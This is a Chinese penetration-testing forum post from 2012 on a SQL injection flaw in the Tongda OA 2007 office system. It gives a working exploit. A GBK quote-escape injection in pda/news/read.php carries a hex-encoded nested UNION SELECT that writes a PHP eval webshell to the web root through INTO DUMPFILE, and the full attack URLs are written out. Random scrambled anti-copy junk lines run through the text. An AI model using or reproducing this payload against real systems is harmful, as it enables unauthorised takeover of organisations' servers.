中国网络渗透测试联盟
标题:
通达OA2007版本漏洞及getshell
[打印本页]
作者:
admin
时间:
2012-12-20 08:09
标题:
通达OA2007版本漏洞及getshell
目前测试通达OA2007版本
, P0 w( k' x! c3 |) ?
9 B m8 k6 L+ B- d
# d& p" ?+ N/ |4 E9 S% F% S
Office Anywhere 2007 网络智能办公系统
8 `) L: v( G" X+ i# F' E9 w( ~
: q8 E: ^3 N/ v1 ~2 `5 d; F
http://127.0.0.1/pda/news/read.php?P=%cf'
猪点。 暴web目录..
9 C+ e& l4 u# W$ i! o7 q- L
% ~) u- { T/ `5 N( Q% k5 `/ O& _4 A
3 X2 T6 p1 s0 N/ {4 v
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
! C! b/ U2 K5 }
$ o6 m) t& I9 t- W7 o) _
例如:SELECT * from USER where USER_ID='{$USERNAME}'
! Q# V! i( [# M2 U4 @" K( F
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
/ ~. i* C: Y1 N5 ~& m5 L ~
* O3 E, z: b% ]6 T7 T7 S7 E
这个时候我们是不是可以组合起来使用哪?
9 w9 i% h, A; p6 h6 \
( S1 t* n h7 i$ o( t+ P7 G$ j
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
2 t( i6 H2 {5 p& d6 L
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
# C1 G. j, K {2 X' k; }9 V
' k; t7 D; j; f+ X; C. @+ O, @
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
5 m" b: Y1 a4 B% f
' J& \$ I% ^! m; F( H: c b+ F
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
9 J/ z7 d; j6 H0 a" e( q1 p
: U& m, M# u- o( D7 R5 i
那么我们用字符串格式带入进行hex编码
/ c+ p8 Q! B1 Y' k8 f; r
9 D2 v; X/ K! H& D5 Z
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
0 D8 ?0 m) i$ D& v* G& Y. O# h
0 Z! o% I: ~. t+ u0 X1 @+ K
测试ok,获取oa的webshell
3 `8 U3 r3 ~+ R
9 ^* A+ u+ l% `: J2 `; X5 O' C
: R* I, Y& n8 t& \7 E; g1 {* k# z" i
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
+ G* X/ p1 d& Y3 ~
直接getwebshell
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2